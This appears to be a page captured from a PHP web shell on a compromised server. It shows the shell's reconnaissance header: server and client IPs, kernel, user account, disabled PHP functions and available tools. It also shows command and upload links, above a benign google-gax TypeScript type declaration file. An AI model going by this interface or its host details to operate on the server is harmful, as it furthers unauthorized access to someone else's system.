Server IP : 92.205.26.207 / Your IP : 216.73.216.16 Web Server : Apache System : Linux 207.26.205.92.host.secureserver.net 4.18.0-553.60.1.el8_10.x86_64 #1 SMP Thu Jul 10 04:01:16 EDT 2025 x86_64 User : zikryat ( 1002) PHP Version : 8.3.23 Disable Function : exec,passthru,shell_exec,system MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/zikryat/public_html/node_modules/google-gax/build/src/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
import { GrpcClientOptions, ClientStubOptions } from './grpc'; import * as gax from './gax'; import { GoogleAuthOptions } from 'google-auth-library'; import { BundleDescriptor, LongrunningDescriptor, PageDescriptor, StreamDescriptor } from './descriptor'; import * as longrunning from './longRunningCalls/longrunning'; import * as operationProtos from '../protos/operations'; export interface ClientOptions extends GrpcClientOptions, GoogleAuthOptions, ClientStubOptions { libName?: string; libVersion?: string; clientConfig?: gax.ClientConfig; fallback?: boolean | 'rest' | 'proto'; apiEndpoint?: string; } export interface Descriptors { page: { [name: string]: PageDescriptor; }; stream: { [name: string]: StreamDescriptor; }; longrunning: { [name: string]: LongrunningDescriptor; }; batching?: { [name: string]: BundleDescriptor; }; } export interface Callback<ResponseObject, NextRequestObject, RawResponseObject> { (err: Error | null | undefined, value?: ResponseObject | null, nextRequest?: NextRequestObject, rawResponse?: RawResponseObject): void; } export interface LROperation<ResultType, MetadataType> extends longrunning.Operation { promise(): Promise<[ ResultType, MetadataType, operationProtos.google.longrunning.Operation ]>; } export interface PaginationCallback<RequestObject, ResponseObject, ResponseType> { (err: Error | null, values?: ResponseType[], nextPageRequest?: RequestObject, rawResponse?: ResponseObject): void; } export interface PaginationResponse<RequestObject, ResponseObject, ResponseType> { values?: ResponseType[]; nextPageRequest?: RequestObject; rawResponse?: ResponseObject; }